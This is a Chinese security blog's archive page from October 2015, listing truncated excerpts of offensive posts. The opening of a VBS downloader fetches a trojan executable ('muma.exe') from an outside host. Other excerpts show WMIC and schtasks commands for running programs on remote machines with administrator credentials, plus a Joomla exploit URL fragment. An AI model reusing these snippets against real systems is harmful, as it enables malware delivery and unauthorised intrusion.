10 2015 档案

摘要:一、VBS下载者:Set Post = CreateObject("Msxml2.XMLHTTP")Set Shell = CreateObject("Wscript.Shell")Post.Open "GET","http://www.03389.com/muma.exe",0Post.Send(... 阅读全文
posted @ 2015-10-29 12:01 Hookjoy 阅读(726) 评论(0) 推荐(0) 编辑
摘要:WMIC远程运行命令wmic /node:host /user:administrator /p 密码 process call create “c:\windows\temp\foobar.exe”schtasks计划任务远程运行schtasks /create /tn foobar /tr c:... 阅读全文
posted @ 2015-10-24 13:16 Hookjoy 阅读(414) 评论(0) 推荐(0) 编辑
摘要:http://www.sebug.net/vuldb/ssvid-89680#0-tsina-1-18081-397232819ff9a47a7b7e80a40613cfe1http://10.211.55.3/joomla/index.php?option=com_contenthistory&v... 阅读全文
posted @ 2015-10-24 01:42 Hookjoy 阅读(409) 评论(0) 推荐(0) 编辑
摘要:引子离上篇文章的时间过去很久了,答应写一篇内网渗透的文章,今天抽点时间,把这个坑给添平了吧。标题是浅谈,所以我不认为自己能在内网渗透写的有多深入。渗透这玩意更多是经验,积累的多了自然水到渠成。而且我个人认为很多前辈人物都已经写的很好了,我这里纯粹抛砖引玉,把前辈级人物的经验集成在一起,也算基础篇吧。... 阅读全文
posted @ 2015-10-22 18:27 Hookjoy 阅读(462) 评论(0) 推荐(0) 编辑
摘要:OWASP top 10的安全威胁中的CrossSite Scripting(跨站脚本攻击),允许攻击者通过浏览器往网站注入恶意脚本。这种漏洞经常出现在web应用中需要用户输入的地方,如果网站有XSS漏洞,攻击者就可以通过这种漏洞向浏览网站的用户发送恶意脚本,同时也可以利用该漏洞偷取sessioni... 阅读全文
posted @ 2015-10-22 18:24 Hookjoy 阅读(1130) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示